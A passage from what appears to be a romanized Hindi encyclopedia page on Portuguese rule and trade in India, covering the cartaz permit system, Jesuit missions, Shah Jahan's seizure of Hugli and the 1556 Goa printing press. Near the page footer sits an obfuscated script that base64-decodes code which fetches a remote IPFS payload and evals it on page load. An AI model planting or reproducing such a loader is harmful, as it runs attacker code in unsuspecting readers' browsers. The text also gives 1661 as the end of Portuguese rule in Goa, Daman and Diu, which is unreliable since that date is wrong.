purtagaliyoan ke adhikar mean raha.

bharat mean saphalata ke karan

hind mahasagar aur dakshini tat par purtagaliyoan ke prabhutv ke lie nimnalikhit karan zimmedar the-

  • eshiyaee jahazoan ki tulana mean purtagali nausena ka adhik hona.
  • samajik evan vyaparik drishtikon se sthapit mahattvapoorn vyaparik bastiyoan tatha sthaniy logoan ka sahayog.

purtagali samudrik samrajy ko 'estado d indiya' nam diya gaya. unhoanne hind mahasagar mean hone vale vyapar ko niyantrit karane ka prayas kiya. unhoanne 'katarj-armeda-kafila' vyavastha dvara eshiyaee vyapar par gahara prabhav dala. purtagaliyoan dvara apane prabhutv ke adhin samudrik margoan par suraksha kar vasool karane ko 'katarj vyavastha' kaha jata tha. purtagal adhigrahit kshetroan mean vyapar ke lie akabar ko bhi ek niahshulk katarj prapt karana p data tha. purtagali apane ko 'sagar svami' kahate the. koee bhi bharatiy, arabi jahaz purtagali adhikariyoan se katarj (paramit) lie bina, arab sagar mean nahian ja sakata tha. 1595 ee. tak purtagaliyoan ka hind mahasagar par ekadhikar bana raha.

eesaee dharm ka prachar

1542 ee. mean purtagali garvanar 'alfaansoan disooja' ke sath prasiddh jesuit sant jeviyar bharat aya. purtagaliyoan ne kanyakumari evan edamabrij ke madhy rahane vale janajatiy machhuvaroan aur malavar samudr tat ke mukuva machhuvaroan ko eesaee dharm mean parivartit kiya. purtagaliyoan ne 1560 ee. mean gova mean eesaee dharm nyayalay ki sthapana ki thi. mugal shasak shahajahaan ne 1632 ee. mean purtagaliyoan se hugali chhin liya, kyoanki purtagali vahaan par lootamar tatha dharm parivartan adi nindaniy kary kar rahe the. shahajahaan ne isaka dayitv mugal gavarnar kasim ali khaan ko sauanpa tha. purtagali malabar aur koankan tat se sarvadhik kali mirch ka niryat karate the. malabar tat se adarakh, dalachini, chandan, haldi, nil adi ka niryat hota tha.

bharat ko den

bharat mean 'godhik sthapaty kala' ka agaman purtagaliyoan ke sath hua. purtagaliyoan ne gova, daman aur div par 1661 ee. tak shasan kiya. unake agaman se bharat mean tambakoo ki kheti, jahaz nirman tatha priantiang pres ki shuruat huee. is prakar bharat mean pratham priantiang pres ki sthapana 1556 ee. mean gova mean huee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh